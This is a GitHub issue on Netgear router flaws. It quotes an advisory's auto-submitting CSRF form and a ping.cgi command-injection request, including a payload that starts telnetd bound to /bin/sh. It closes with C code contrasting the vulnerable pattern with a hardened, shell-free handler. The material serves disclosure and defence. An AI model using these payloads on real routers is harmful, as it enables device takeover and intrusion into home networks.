Netgear N300 DGN2200 uPnP CSRF? #51

Open
hkm opened this issue Dec 9, 2014 · 0 comments
hkm commented Dec 9, 2014

4/26/2014 23:43:52 "How about uPnP CSRF?

Netgear N300 DGN2200
according to http://www.baesystemsdetica.com.au/Research/Advisories/NETGEAR-DGN2200-Multiple-Vulnerabilities-(AIS-2014
http://osvdb.org/103230

Netgear WNDR3400v3
according to http://disconnected.io/2014/03/18/how-i-hacked-your-router/
Netgear DG384v5
(tested myself)

PoC taken from the BAE report

<textarea id="1" name="1" width="80" height="25"> hax3 0 192.168.0.1 1 8888 TCP 80 </textarea>

<input type="submit" >

<script>document.forms[0].submit();</script>

Secondly the BAE report for DGN2200 also has a command injection / CSRF for the ping diagnostic page, which worked great on my DG834Gv5. (I just used the Firefox debugger's Net tab, with "Edit and Resend"). I quote:

Example exploitation to obtain a file and directory listing:

POST /ping.cgi HTTP/1.1
Host: 192.168.0.1
Proxy-Connection: keep-alive
Content-Length: 81
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YXBwbGU3ODE=
Origin: http://192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://192.168.0.1/DIAG_diag.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls

To get an interactive shell,

  1. Send the following POST data:
    IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh
  2. Telnet to port 90" Alan Jenkins [email protected]
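The ping.cgi injection quoted above works because the ping_IPAddr field reaches a shell. The C below is an added example, not code from this issue, the BAE advisory or Netgear's firmware: it shows the vulnerable string-building pattern beside a hardened handler that accepts the field only as a literal IPv4 address and runs ping through execvp with no shell; build_shell_cmd, validate_ipv4 and safe_ping are hypothetical names.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/wait.h>
#include <arpa/inet.h>

/* Vulnerable pattern (hypothetical reconstruction): the user-controlled
 * ping_IPAddr value is pasted into a shell command line, so "|ls" becomes a
 * second command. Only builds the string; such firmware would call system() on it. */
int build_shell_cmd(char *out, size_t outlen, const char *ping_ipaddr)
{
    return snprintf(out, outlen, "ping -c 3 %s", ping_ipaddr);
}

/* Hardened check: accept only a literal dotted-quad IPv4 address.
 * inet_pton() rejects metacharacters, spaces, hostnames and empty input. */
int validate_ipv4(const char *s)
{
    struct in_addr addr;
    if (s == NULL || strlen(s) > 15)   /* "255.255.255.255" is 15 chars */
        return 0;
    return inet_pton(AF_INET, s, &addr) == 1;
}

/* Hardened runner: validate, then exec ping with an argv array and no shell.
 * Returns -1 if the input was rejected or exec setup failed, else ping's exit status. */
int safe_ping(const char *ping_ipaddr)
{
    if (!validate_ipv4(ping_ipaddr))
        return -1;
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = {"ping", "-c", "3", (char *)ping_ipaddr, NULL};
        execvp("ping", argv);   /* address is one argv entry, never parsed by a shell */
        _exit(127);             /* exec failed */
    }
    int status = 0;
    waitpid(pid, &status, 0);
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char cmd[128];
    build_shell_cmd(cmd, sizeof cmd, "|ls");
    printf("vulnerable handler would run: %s\n", cmd);
    printf("hardened check on \"|ls\": %d\n", validate_ipv4("|ls"));
    return 0;
}
```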